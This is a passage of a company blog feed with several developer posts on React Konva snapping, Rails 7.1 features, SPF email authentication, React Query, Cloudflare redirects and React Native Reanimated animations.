);}</code></pre><p>We have successfully implemented snapping functionality in the canvas, allowingthe shapes to snap to a specific location while being dragged. You can now trymoving the shapes near the edges and center of other shapes to see the snappingin action.<img src="/blog_images/2023/shape-snapping-with-react-konva/snapping-demo.gif" alt="Snapping Demo"></p><p>All implementation details and live demo can be found in this<a href="https://codesandbox.io/s/floral-browser-8y5gvb">CodeSandbox</a>.</p><p><em><a href="https://www.neeto.com/neetowireframe">NeetoWireframe</a> has not been launchedfor everyone yet. We are internally using it and are happy with how its shapingup. If you want to give it a try, then please send an email toinvite@neeto.com.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds ActiveRecord::Base::normalizes]]></title>
       <author><name>Abhijith Sheheer</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-activerecord-base-normalizes"/>
      <updated>2023-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-activerecord-base-normalizes</id>
      <content type="html"><![CDATA[<p>Rails 7.1 has introduced a new method in Active Record that can be used todeclare normalizations for attribute values. This can be especially useful forsanitizing user input, ensuring consistent formatting, or cleaning up data fromexternal sources.</p><p>Before Rails 7.1, you could normalize attributes using <code>before_save</code> callback.</p><pre><code class="language-ruby">model User &lt; ApplicationRecord  before_save :downcase_email, if :email_present?  private    def email_present?      email.present?    end    def downcase_email      email.downcase!    endend</code></pre><p>In Rails 7.1, you can refactor the above to the code below.</p><pre><code class="language-ruby">model User &lt; ApplicationRecord  normalizes :email, with: -&gt; email { email.downcase }end</code></pre><p>The normalization is applied when the attribute is assigned or updated, and thenormalized value will be persisted to the database. The normalization is alsoapplied to the corresponding keyword argument of finder methods. This allows arecord to be created and later queried using unnormalized values.</p><p>By default, normalization is not applied to <code>nil</code> values. To normalize<code>nil</code> value, you can enable it using <code>:apply_to_nil</code> option.</p><pre><code class="language-ruby">model User &lt; ApplicationRecord  normalizes :user_name, with:    -&gt; user_name { user_name.parameterize.underscore }  normalizes :email, with: -&gt; { _1.strip.downcase }  normalizes :profile_image, with:    -&gt; profile_image {      profile_image.present? ? URI.parse(profile_image).to_s :      &quot;https://source.boringavatars.com/beam&quot; },    apply_to_nil: trueend</code></pre><pre><code class="language-ruby"># rails console&gt;&gt; User.create!(user_name: &quot;Eve Smith&quot;, email: &quot;eveSmith@EXAMPLE.com&quot;)#&lt;User:0x000000010b757090 id: 1, user_name: &quot;eve_smith&quot;, profile_image:&quot;https://source.boringavatars.com/beam&quot;, email: &quot;evesmith@example.com&quot;, created_at: Wed, 03 May 2023 07:49:20.067765000 UTC +00:00, updated_at: Wed, 03 May 2023 07:49:20.067765000 UTC +00:00&gt;&gt;&gt; user = User.find_by!(email: &quot;EVESMITH@example.COM&quot;)&gt;&gt; user.email # =&gt; &quot;evesmith@example.com&quot;&gt;&gt; User.exists?(email: &quot;EveSmith@Example.COM&quot;)          # =&gt; true</code></pre><p>If a user's email was already stored in the database before the normalizationstatement was added to the model, the email will not be retrieved in thenormalized format.</p><p>This is because in the database it's stored in mixed case, that is, without thenormalization. If you have legacy data, you can normalize it explicitly usingthe <code>Normalization#normalize_attribute</code> method.</p><pre><code class="language-ruby"># rails console&gt;&gt; legacy_user = User.find(1)&gt;&gt; legacy_user.email  # =&gt; &quot;adamSmith@EXAMPLE.com&quot;&gt;&gt; legacy_user.normalize_attribute(:email)&gt;&gt; legacy_user.email  # =&gt; &quot;adamsmith@example.com&quot;&gt;&gt; legacy_user.save</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43945">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How SPF protects domain reputation and helps in email deliverability]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-spf-protects-domain-reputation"/>
      <updated>2023-04-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-spf-protects-domain-reputation</id>
      <content type="html"><![CDATA[<p>Email is a wonderful thing. Anyone can send an email to anyone, and it all worksbeautifully. In the early stages of the Internet, we didn't have to worry aboutsecurity and scammers. As emails started to play a more vital role in our lifescammers started to con people to steal their money.</p><p>Not only can anyone send an email to anyone, but anyone can pretend to be anyone. Ican send an email to you and the email will come to you as if it were sent by&quot;Elon Musk&quot; and the from address could be &quot;elon@musk.com&quot;.</p><p>I can send an email to you pretending that the email is from your bank and youneed to change your password. In one case, a hacker sent an email to a company'sfinance team telling them that the company's bank account number has changed.The hacker walked away with millions of dollars.</p><p>Hackers can also do damage to one's domain reputation.</p><p>Let's assume that there is a business called &quot;PrixPapers&quot; and they havethousands of customers all over the country. Malicious folks can start sendingemails to people pretending to be &quot;PrixPapers&quot;. When people receive an emaillike this they might buy the item. The item could be &quot;fake goods&quot;. Ideally, noone should be able to send any email pretending to be someone else.</p><p>Since these malicious folks don't have the actual list of the customers ofPrixPapers will in general spam people. Some people receiving this email willmark these emails as &quot;spam&quot;. As more and more people mark these emails as &quot;spam&quot;the domain reputation of &quot;prixpapers.com&quot; will go down. It means that when&quot;prixpapers.com&quot; will send out a legitimate newsletter to its customers some ofthese emails will be marked as &quot;spam&quot; because of the nefarious work done by theprevious scammer.</p><p>The challenge presented to the Internet authorities is that they want to keepemail simple but safe at the same time. They came up with certain policies tomake emails safe and secure. In this blog, we will see how SPF helps in keepingemail secure. However, first, we need to know what is &quot;Return-path&quot;. We'll latersee how it is used in blocking fake emails.</p><h3>Return-path</h3><p>Let's say that we are dealing with a company called<a href="https://www.neeto.com/neetocal">NeetoCal</a>. They have the domain <em>neetocal.com</em>.</p><p>Let's say that <em>brian@neetocal.com</em> sent an email to <em>peter@gmail.com</em>. Let'spretend that for some reason Peter's mailbox is full and the email sent by Brianbounces. In that case, Brain will get an email that the message bounced. We allhave seen these kinds of messages.</p><p>Now let's imagine that it's end of the year sale time and NeetoCal decided tosend an email campaign to all its customers giving them a 10% discount. Thisemail will go out to their 5000 customers. Some of these emails are bound tobounce. If all the bounced emails come to Brain then Brain's inbox would befilled with such bounced emails.</p><p>To solve this problem email protocol allows us to set a hidden field called<em>Return-path</em>. This value can be set in the email header. <em>Return-path</em> set inthe email header indicates how to process bounced emails. Anytime an emailserver detects that an email can't be delivered for reasons like &quot;mailbox isfull&quot; or &quot;the email doesn't exist&quot; then that email server can send an email tothe email address mentioned in <em>Return-path</em>. The business owner can look at<em>Return-path</em> emails to analyze how many emails are bouncing and why.</p><p>If you are sending an email using &quot;Gmail&quot;, &quot;outlook&quot;, &quot;yahoo&quot; etc then the<em>Return-path</em> is set as your email so that you get to know if there is a bouncedemail. Email service providers allow us to customize <em>Return-path</em> in case oneis running a big marketing campaign. For example here is a<a href="https://sendgrid.com/blog/what-is-return-path">document</a> from SendGriddescribing how to set <em>Return-path</em>.</p><p>Why are we talking about how bounced emails are processed when we are dealingwith the subject of &quot;email deliverability&quot;. That's because <em>Return-path</em> plays adual role as we will see next.</p><h2>What is SPF record</h2><p>Before we get into the SPF record, let's take a simple real-world example of how itworks.</p><p>Let's say there's a gatekeeper at the NeetoCal office. This gatekeeperwill only allow the people who work there. It means the gatekeeper has a list ofapproved people and for each person getting through the gate, the gatekeeperchecks if the person is in the approved list or not.</p><p>SPF works similarly. SPF policy is a mechanism to tell the email server if theemail is coming from a trusted source, then accept the email or reject the email.A sender policy framework (SPF) record is a type of DNS TXT record that listsall the servers authorized to send emails from a particular domain.</p><p>Let's take a real-world example. The SPF record of neetocal.com looks like<code>v=spf1 include:spf.messagingengine.com -all</code>. We can see this data<a href="https://mxtoolbox.com/SuperTool.aspx?action=spf%3aneetocal.com&amp;run=toolpage">using mxtoolbox</a>.</p><h3>How the SPF record is used</h3><p>Let's look at the following case.</p><p>Step 1. <em>notifications@neetocal.com</em> sends an email to <em>elon@gmail.com</em>.</p><p>Step 2. This email is sent to <a href="https://fastmail.com">Fastmail</a> since NeetoCal isusing the Fastmail services.</p><p>Step 3. The Fastmail email server receives this email as an outgoing email.</p><p>Step 4. Fastmail email server adds email header <em>Return-path</em> value to&quot;notifiations@neetocal.com&quot;.</p><p>Step 5. The Fastmail email server sends this email to the gmail server.</p><p>Step 6. The Gmail server gets this email.</p><p>Step 7. The Gmail server extracts the <em>Return-path</em> key and finds that thedomain is &quot;neetocal.com&quot;.</p><p>Step 8. The Gmail server finds the TXT DNS records of &quot;neetocal.com&quot;. This listsall the approved IP addresses.</p><p>Step 9. The Gmail server will check if the email server which sent the email isin the approved IP addresses or not.</p><p>Step 10. If the IP address is in the approved IP addresses list then the emailis approved for further processing. Otherwise, the email is rejected.</p><p>We can go to https://dmarcian.com/spf-survey/ and enter &quot;neetocal.com&quot; here.They get the IP addresses published for &quot;messagingengine.com&quot; and then they showthe list of the approved IPs.</p><h3>Allowing the third party to send emails on your behalf</h3><p>Let's say that Brian decides to use <a href="https://www.mailerlite.com">Mailerlite</a> tosend marketing emails. Now if Mailerlite sends an email then the receiving emailserver will notice that the IP address of Mailerlite is not in the approved listof ips and the email will be rejected.</p><p>A domain is allowed to have only one SPF record. So if NeetoCal wants to useMailerlite for marketing then the spf records need to be updated. If you signupfor a domain in Mailerlite then Mailerlite will check if that domain has anexisting SPF record or not. If there is no SPF record then Mailerlite won't doanything. However, if there is an existing SPF record then Mailerlite willinsist that first you update the SPF record to include Mailerlite so that theemails from Mailerlite are not rejected.</p><p><a href="https://bigbinary.com">BigBinary</a> uses Mailerlite to email newly publishedblogs to the subscribers. Given below is what the SPF record of BigBinary lookslike. We can also see this result<a href="https://mxtoolbox.com/SuperTool.aspx?action=spf%3abigbinary.com&amp;run=toolpage">online</a>.</p><pre><code>v=spf1 include:_spf.mlsend.com include:_spf.google.com -all</code></pre><p>BigBinary uses google workspace so the second include is for that reason. Thefirst include is to ensure that Mailerlite is in the allowed ip list.</p><p>If we look at the result for &quot;bigbinary.com&quot; by visitinghttps://dmarcian.com/spf-survey/ then we will that all these includes are likeregular programming language &quot;imports&quot;. They allow the third party to includeother third parties in the chain. The end result is that we have a finite listof approved IP addresses which can send email.</p><h2>spf record standard</h2><p>Let's take a look at NeetoCal's SPF record.</p><pre><code>v=spf1 include:spf.messagingengine.com -all</code></pre><p><code>v=spf1</code> tells the server that this record contains an SPF record. Every SPFrecord must begin with this string.</p><p><code>include:spf.messagingengine.com</code> tells the server what third-partyorganizations are authorized to send emails on behalf of the domain. This tagsignals that the content of the SPF record for the included domain(messagingengine.com in this case) should be checked and the IP addresses itcontains should also be considered authorized. Multiple domains can be includedwithin an SPF record.</p><p><code>-all</code> tells the server that addresses not listed in the SPF record is notauthorized to send emails and should be rejected. Alternative options hereinclude <code>~all</code>, which states that unlisted emails will be marked as insecure orspam but still accepted. <code>+all</code> signifies that any server can send emails onbehalf of the domain.</p><p>Here is another format of SPF record.</p><pre><code>v=spf1 ip4=192.0.2.0 ip4=192.0.2.1 include:messagingengine.email -all</code></pre><p>In this example, the SPF record is telling the server that ip4=192.0.2.0 andip4=192.0.2.1 are also authorized to send emails on behalf of the domain.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds support for logging background job enqueue callers]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-support-for-logging-background-job-enqueue-callers"/>
      <updated>2023-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-support-for-logging-background-job-enqueue-callers</id>
      <content type="html"><![CDATA[<p>Rails 7.1 has introduced a new option in Active Job that allows us to addsupport for logging background job enqueue callers. It provides informationabout the location from where a job was enqueued, which can be immensely helpfulduring debugging. The following is an example of what the log output looks like:</p><pre><code class="language-ruby">[ActiveJob] Enqueued NotifySubscribersJob (Job ID: 5945980f-303e-4c3f-af5b-e22be170f7c5) to Sidekiq(default)[ActiveJob]  app/models/post.rb:14 in `notify_subscribers`</code></pre><p>By examining the logs above, we can determine that the <code>NotifySubscribersJob</code>was enqueued from the <code>notify_subscribers</code> method in the <code>Post</code> model, providingus with a clear picture of the job's origin.</p><p>To enable this functionality, we need to set the following configuration in<code>config/environments/development.rb</code>.</p><pre><code class="language-rb">config.active_job.verbose_enqueue_logs = true</code></pre><p>However, Rails 7.1 ships with this configuration set by default.</p><p>It's important to note that using verbose enqueue logs in a production environmentis not recommended, as it uses the<a href="https://apidock.com/ruby/Kernel/caller">Kernel#caller</a> method to retrieve theexecution stack, which can be slow.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47839">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[React Query to simplify data fetching in Neeto]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/react-query"/>
      <updated>2023-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-query</id>
      <content type="html"><![CDATA[<h2>Introduction</h2><p><a href="https://tanstack.com/query/v3/docs/react/overview">React Query</a> is a powerfultool that simplifies the data fetching, caching and synchronization with theserver by providing a declarative and composable API of hooks. It was created byTanner Linsley in 2020 and has gained a lot of popularity since then.</p><p>It uses a cache-first approach to optimize the user experience by reducing thenumber of network requests made by the application. React Query also providesbuilt-in support for features like pagination, optimistic updates, and retryingfailed requests.</p><p>While building <a href="https://neeto.com">neeto</a> we started using React Query and welearned a few things about how to effectively use it. Below are some of thelessons we learned.</p><h2>Major advantages of using React Query</h2><ol><li><p><strong>Simplifies data fetching - It erases a lot of boilerplate and makes ourcode easier to read.</strong></p><p>Here is a comparison of code structure with and without using <code>react-query</code>to fetch data from the server:</p><p>Without React Query:</p><pre><code class="language-js">const [isLoading, setIsLoading] = useState(false);const [data, setData] = useState([]);const [error, setError] = useState(null);useEffect(() =&gt; {  setIsLoading(true);  (async () =&gt; {    try {      const data = await fetchPosts();      setData(data);    } catch (error) {      setError(error);    } finally {      setIsLoading(false);    }  })();}, []);</code></pre><p>With React Query:</p><pre><code class="language-js">const { isInitialLoading, data, error } = useQuery([&quot;posts&quot;], fetchPosts);</code></pre><p>React Query provides a <code>useQuery</code> hook to fetch data from the server. Theentire <code>useEffect</code> was replaced with a single line with React Query. The<code>isInitialLoading</code>, <code>error</code> and the data state is handled out of the box.</p></li><li><p><strong>Provides tools to improve user experience and prevent unnecessary APIcalls.</strong></p><p>React Query provides a powerful caching mechanism that can help preventunnecessary API calls by storing the results of API requests in a cache. Whena component requests data from the API using React Query, it first checks ifthe data is already present in the cache. If the data is present and hasn'texpired, React Query returns the cached data instead of making a new APIcall.</p><p>Here's an example:</p><p>Suppose we have a component that displays a list of todos fetched from an APIendpoint at <code>https://api.example.com/todos</code>. We can use React Query to fetchthe data and store it in the cache like this:</p><pre><code class="language-js">import { useQuery } from &quot;@tanstack/react-query&quot;;const TodoList = () =&gt; {  const { data, isInitialLoading, isError } = useQuery(    [&quot;todos&quot;],    () =&gt; axios.get(&quot;https://api.example.com/todos&quot;),    {      staleTime: 10000, // data considered &quot;fresh&quot; for 10 seconds    }  );  if (isInitialLoading) {    return &lt;div&gt;Loading...&lt;/div&gt;;  }  if (isError) {    return &lt;div&gt;Error fetching data&lt;/div&gt;;  }  return (    &lt;ul&gt;      {data.map(todo =&gt; (        &lt;li key={todo.id}&gt;{todo.title}&lt;/li&gt;      ))}    &lt;/ul&gt;  );};export default TodoList;</code></pre><p>In this example, <code>useQuery</code> is used to fetch the data from the API endpoint.The first argument to useQuery is a unique key that identifies the query, andthe second argument is a function that returns the data by making a requestto the API endpoint.</p><p>Now, suppose the user navigates away from the <code>TodoList</code> component and thencomes back to it, if the data in the cache hasn't expired, React Query willreturn the cached data instead of making a new API call, which can helpprevent unnecessary network requests.</p><p>If the cache time has expired, React Query will not show the loading statebecause it will automatically trigger a new API call to fetch the data.During this time, React Query will return the stale data from the cache whileit waits for the new data to arrive. This means that our component willcontinue to display the old data until the new data arrives, but it won'tshow a loading state because it's not waiting for the data to load.</p><p>Once the new data arrives, React Query will update the cache with the newdata and then return the updated data to the component.</p></li><li><p><strong>Request Retries - Ability to retry a request in case of errors.</strong></p><p>React Query provides built-in support for request retries when API requestsfail. This can be useful in situations where network connectivity isunreliable, or when the server is under heavy load and returns intermittenterrors.</p><p>When we use useQuery or useMutation from React Query, we can provide anoptional retry option that specifies the number of times to retry a failedrequest. Here's an example:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery(  [&quot;todos&quot;],  () =&gt; axios.get(&quot;https://api.example.com/todos&quot;),  {    retry: 4, // retry up to 4 times  });</code></pre><p>In this example, we're using <code>useQuery</code> to fetch data from an API endpoint.We've set the retry option to 4, which means that React Query will retry theAPI request up to 4 times if it fails. If the API request still fails after 4retries, React Query will return an error to our component.</p><p>We can also customize the behavior of request retries by providing a functionto the <code>retryDelay</code> option. This function should take the current retry countas an argument and return the number of milliseconds to wait before retryingthe request. Here's an example:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery(  [&quot;todos&quot;],  () =&gt; axios.get(&quot;https://api.example.com/todos&quot;).then(res =&gt; res.json()),  {    retry: 3, // retry up to 3 times    retryDelay: retryCount =&gt; Math.min(retryCount * 1000, 30000), // wait 30 seconds between retries  });</code></pre></li><li><p><strong>Window Focus Refetching - Refetching based on application tab activity.</strong></p><p>Window Focus Refetching is a feature of React Query that allows us toautomatically refetch our data when the user returns to our application's tabin their browser. This can be useful if we have data that changes frequentlyor if we want to ensure that our data is always up to date.</p><p>React Query will automatically refetch our data when the user returns to ourapplication's tab in their browser. Please note that <code>refetchOnWindowFocus</code>is true by default.</p><p>To disable it, we can do it per query or globally in the query client.</p><p>Disabling per-query:</p><pre><code class="language-js">useQuery([&quot;todos&quot;], fetchTodos, { refetchOnWindowFocus: false });</code></pre><p>Disabling globally:</p><pre><code class="language-js">const queryClient = new QueryClient({  defaultOptions: {    queries: {      refetchOnWindowFocus: false, // default: true    },  },});</code></pre></li></ol><h2>How to integrate React Query</h2><ol><li><p>We can install React Query using <code>npm</code> or <code>yarn</code>. Open the terminal andnavigate to the project directory. Then, run one of the following commands:</p><p>Using npm:</p><pre><code> npm install @tanstack/react-query</code></pre><p>Using yarn:</p><pre><code> yarn add @tanstack/react-query</code></pre></li><li><p>To integrate react query, first we need to wrap it a <code>QueryClientProvider</code>.In the <code>App.jsx</code> file (or whichever is the topmost parent),</p><pre><code class="language-js">import queryClient from &quot;utils/queryClient&quot;;import { ReactQueryDevtools } from &quot;@tanstack/react-query-devtools&quot;;import { QueryClientProvider } from &quot;@tanstack/react-query/reactjs&quot;;const App = () =&gt; (  &lt;QueryClientProvider client={queryClient}&gt;    &lt;Main /&gt;    &lt;ReactQueryDevtools initialIsOpen={false} /&gt;  &lt;/QueryClientProvider&gt;);export default App;</code></pre><p><code>ReactQueryDevtools</code> is a great tool for debugging and optimizing our ReactQuery cache. With <code>ReactQueryDevtools</code>, we can view the current state of ourqueries, including the query status, data, and any errors that may haveoccurred. We can also view the cache entries and manually trigger queries orinvalidate cache entries.</p><pre><code class="language-js">import { QueryClient } from &quot;@tanstack/react-query&quot;;const queryClient = new QueryClient({  defaultOptions: {    queries: {      staleTime: 100_000,    },  },});export default queryClient;</code></pre><p>The <code>queryClient</code> holds the query cache. The query client provider is aReact context provider, which allows us to access the client (and thus thecache) without passing it as a prop explicitly. Every time we call<code>useQueryClient()</code> , we get access to this client. The <code>useQuery</code> &amp;<code>useMutation</code> hooks use the query client internally.</p><p><code>staleTime</code> is the duration until a query transitions from fresh to stale.As long as the query is fresh, data will always be read from the cache only.<code>cacheTime</code>: The duration until inactive queries will be removed from thecache. This defaults to 5 minutes.</p><p>Most of the time, if we want to change one of these settings, it's the<code>staleTime</code> that needs adjusting. We have rarely ever needed to tamper withthe <code>cacheTime</code>.</p></li><li><p>React query provides us mainly two hooks to fetch and mutate data:<code>useQuery</code> and <code>useMutation</code>.</p><p><code>useQuery</code>:</p><pre><code class="language-js">const { data, isInitialLoading, isError } = useQuery([&quot;todos&quot;], () =&gt;  axios.get(&quot;https://api.example.com/todos&quot;));</code></pre><p>In this example, we're using useQuery to fetch data from an API endpoint at<code>https://api.example.com/todos</code>. The first argument to <code>useQuery</code> is aunique key that identifies this query. The second argument is a functionthat returns a promise that resolves to the data we want to fetch.</p><p>The <code>useQuery</code> hook returns an object with three properties: <code>data</code>,<code>isInitialLoading</code>, and <code>isError</code>. In addition to these, <code>useQuery</code> alsoreturns various other properties like <code>isSuccess</code>, <code>isFetching</code> etc andcallbacks like <code>onError</code>,<code>onSettled</code>,<code>onSuccess</code> etc. The data propertycontains the data that was fetched, while <code>isInitialLoading</code> and <code>isError</code>are booleans that indicate whether the data is currently being fetched or ifan error occurred while fetching it.</p><p><code>useMutation</code>:</p><pre><code class="language-js">import { useQueryClient, useMutation } from &quot;@tanstack/react-query&quot;;const queryClient = useQueryClient();const { mutate, isLoading } = useMutation(  data =&gt;    axios.post(&quot;https://api.example.com/todos&quot;, {      body: JSON.stringify(data),    }),  {    onSuccess: () =&gt; {      queryClient.invalidateQueries(&quot;todos&quot;);    },  });</code></pre><p>In this example, we're using <code>useMutation</code> to send data to an API endpointat <code>https://api.example.com/todos</code> using a <code>POST</code> request. The firstargument to <code>useMutation</code> is a function that takes the data we want to sendand returns a promise that resolves to the response from the API.</p><p>The second argument to <code>useMutation</code> is an options object that allows us tospecify a callback <code>onSuccess</code> function to be called when the mutationsucceeds. In addition to <code>onSuccess</code>, <code>useMutation</code> provides us variousother callbacks such as <code>onError</code>, <code>onMutate</code>,<code>onSettled</code> etc. In this case,we're using the <code>onSuccess</code> option to invalidate the <code>todos</code> query in the<code>queryClient</code>. This will cause the query to be refetched the next time it'srequested, so the updated data will be displayed.</p></li></ol><h2>The standards we follow at BigBinary</h2><ol><li><p>The <code>QueryClientProvider</code> is wrapped in the <code>App.jsx</code> file.</p></li><li><p>The <code>queryClient</code> is placed in <code>utils/queryClient.js</code> file and it can set thedefault values for stale time, cache time etc.</p></li><li><p>We store the query keys in <code>constants/query.js</code> file.</p><pre><code class="language-js">export const DEFAULT_STALE_TIME = 3_600_000;export const QUERY_KEYS = {  WEB_PUSH_NOTIFICATIONS: &quot;web-push-notifications&quot;,  WIDGET_SETTINGS: &quot;widget-settings&quot;,  WIDGET_INSTALLATION_SCRIPT: &quot;widget-installation-script&quot;,};</code></pre></li><li><p>To fetch and mutate data, we can create API hooks in <code>hooks/reactQuery</code>folder and based on the structure of the app, we create folders or filesinside this folder. For example, we can have a <code>hooks/reactQuery/settings</code>folder to separate settings-related hooks from other API hooks.</p></li><li><p>React query hook files are named in the format <code>use*Api</code> where <code>*</code> is thespecific set of <code>apis</code> we are trying to use.</p><p>For example inside <code>hooks/reactQuery/useIntegrationsApi.js</code>:</p><pre><code class="language-js">import { prop } from &quot;ramda&quot;;import { useMutation, useQuery } from &quot;react-query&quot;;import { DEFAULT_STALE_TIME, QUERY_KEYS } from &quot;src/constants/query&quot;;import integrationsApi from &quot;apis/integrations&quot;;import queryClient from &quot;utils/queryClient&quot;;const { THIRD_PARTY_APPS } = QUERY_KEYS;const onMutation = () =&gt; queryClient.invalidateQueries(THIRD_PARTY_APPS);export const useUpdateIntegration = () =&gt;  useMutation(({ id, options }) =&gt; integrationsApi.update(id, options), {    onSuccess: onMutation,  });export const useFetchIntegrations = () =&gt;  useQuery(THIRD_PARTY_APPS, integrationsApi.fetchThirdPartyApps, {    staleTime: DEFAULT_STALE_TIME,    select: prop(&quot;thirdPartyApps&quot;),  });</code></pre></li><li><p>We import the api hooks from the <code>use*Api</code> hook we have created and use it inthe file we would like to fetch or mutate queries.</p><p>For example:</p><pre><code class="language-js">import {  useFetchIntegrations,  useUpdateIntegration,} from &quot;hooks/reactQuery/useIntegrationsApi&quot;;const Integrations = () =&gt; {  const { data: integrationApps, isLoading } = useFetchIntegrations();  const { mutate: updateIntegration, isLoading: isInstalling } =    useUpdateIntegration();  return (    &lt;div&gt;      &lt;DataTable data={data} /&gt;    &lt;/div&gt;  );};export default Integrations;</code></pre></li></ol><p>At BigBinary, we are using React Query v3. Since the update from v3 to v4, therehas been some breaking changes. For more information, refer:<a href="https://tanstack.com/query/v4/docs/react/guides/migrating-to-react-query-4#react-query-is-now-tanstackreact-query">Documentation</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Redirecting URL using cloudflare redirect rules]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/redirecting-url-using-cloudflare"/>
      <updated>2023-03-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redirecting-url-using-cloudflare</id>
      <content type="html"><![CDATA[<p>At BigBinary, we had been using AceInvoice as our time tracking and invoicingtool for years. Last year, we migrated all the data to<a href="https://neeto.com/neetoinvoice">NeetoInvoice</a>.</p><p>All this time, the AceInvoice website was not redirecting to NeetoInvoice. Todaywe did that using <a href="https://cloudflare.com">Cloudflare</a>. The URL forwarding orredirecting with<a href="https://developers.cloudflare.com/support/page-rules/configuring-url-forwarding-or-redirects-with-page-rules/">page rule</a>is a neat feature of Cloudflare. Below are the screenshots of the steps taken toredirect the URLs. More details are covered in the video.</p><h3>Handling www version</h3><p><img src="/blog_images/2023/redirecting-url-using-cloudflare/www-version.png" alt="WWW version"></p><h3>Handling no www version</h3><p><img src="/blog_images/2023/redirecting-url-using-cloudflare/no-www-version.png" alt="No WWW version"></p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/R6-qnYN6PUs&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>We didn't mention it in the video, but it's worth knowing that we need to have a<code>CNAME</code> record for a subdomain that needs forwarding. For examples let's saythat we need to forward all traffic from <code>https://videos.bigbinary.com</code> to<code>https://bigbinary.com/video</code>. We can't add a page rule for this directly. Forwe need to add a DNS entry for subdomain <code>videos</code> and this entry must havecloudflare &quot;proxy&quot; checked so that you see <code>Proxied</code> next to it. If you see &quot;DNSonly&quot; then that means Cloudflare will not be able to do any forwarding.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Running React Native dependent animations on UI thread using Reanimated]]></title>
       <author><name>Sangamesh Somawar</name></author>
      <link href="https://www.bigbinary.com/blog/running-react-native-dependent-animations-on-ui-thread-using-reanimated"/>
      <updated>2023-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/running-react-native-dependent-animations-on-ui-thread-using-reanimated</id>
      <content type="html"><![CDATA[<p><img src="https://user-images.githubusercontent.com/93119254/222339128-047c3afe-543f-48a0-9420-a8c6969a156c.gif" alt="Slider"></p><p>Here we have a slider. When the user slides the slider, the loader needs to showhow much is loaded. We want to animate the loader component when the slidermoves. In other words, the loader animation is &quot;dependent&quot; on the slideranimation.</p><p>This is an example of <em>Dependent Animations</em> on the UI thread. <em>DependentAnimation</em> is when one view is animated based on another element.</p><p>first we need a gesture handler to detect the slider events. Then, based on theslider events we need to animate the progress ofthe  loader component.</p><h3>Building gesture handler to detect the slider events</h3><pre><code class="language-jsx">const [width, setWidth] = useState(200);const x = useSharedValue(0);const gestureHandler = useAnimatedGestureHandler({  onStart: (event, ctx) =&gt; {    x.value = event.absoluteX;  },  onActive: (event, ctx) =&gt; {    x.value = event.absoluteX;    // We need to calculate `progress` here based on the slider position.  },});const animatedStyle = useAnimatedStyle(() =&gt; {  return {    transform: [      {        translateX: x.value,      },    ],  };});return (  &lt;PanGestureHandler onGestureEvent={gestureHandler}&gt;    &lt;Animated.View style={[{ height: 20 }]}&gt;      &lt;Animated.View        pointerEvents=&quot;none&quot;        style={[          {            backgroundColor: &quot;blue&quot;,            height: 20,            width: 20,            borderRadius: 10,          },          animatedStyle,        ]}      /&gt;      &lt;View        pointerEvents=&quot;none&quot;        style={{          backgroundColor: &quot;black&quot;,          height: 2,          width: &quot;100%&quot;,          position: &quot;absolute&quot;,          top: 10,        }}      /&gt;    &lt;/Animated.View&gt;  &lt;/PanGestureHandler&gt;);</code></pre><p><strong>Loader component:</strong></p><pre><code class="language-jsx">&lt;View style={{ height: 20, marginTop: 10 }}&gt;  &lt;Lottie    style={{      alignSelf: &quot;center&quot;,      width: &quot;100%&quot;,    }}    progress={&quot;Calculated `progress` based on slider position.&quot;}    source={require(&quot;./progress&quot;)}    autoPlay={false}    loop={false}  /&gt;&lt;/View&gt;</code></pre><h3>Animate the loader based on the slider position</h3><p>Before we move further, let's understand the difference between UI Thread and JSThread. The UI Thread handles rendering and gestures of Android and iOS views,whereas the JS Thread takes care of all the logic of the React Nativeapplication.</p><p>&lt;video width=&quot;320&quot; height=&quot;240&quot; controls muted&gt;&lt;source src=&quot;https://user-images.githubusercontent.com/93119254/199667917-fa5e172e-6b42-481a-abb4-34040179cef7.mov&quot;&gt;&lt;/video&gt;</p><p>We have two approaches for animating the loader.</p><p>In the first approach, when the slider moves, we can store the <code>progress</code> inreact state and pass it to <a href="https://lottiefiles.com/">Lottie animation</a>. Withthis approach, the entire component rerenders on setting the <code>progress</code>.</p><pre><code class="language-jsx">const [progress, setProgress] = useState(0);const gestureHandler = useAnimatedGestureHandler({  onStart: (event, ctx) =&gt; {    x.value = event.absoluteX;  },  onActive: (event, ctx) =&gt; {    x.value = event.absoluteX;    runOnJS(setProgress)(x.value / width);  },});&lt;Lottie  style={{    alignSelf: &quot;center&quot;,    width: &quot;100%&quot;,  }}  progress={progress}  source={require(&quot;./progress&quot;)}  autoPlay={false}  loop={false}/&gt;;</code></pre><p>In the second approach, when the slider moves, we can calculate <code>progress</code> andpass it to the loader component via the<a href="https://docs.swmansion.com/react-native-reanimated/docs/api/hooks/useAnimatedProps/"><code>useAnimatedProps</code></a>.In this way, the <code>progress</code> gets calculated on the UI thread itself. Hence itavoids 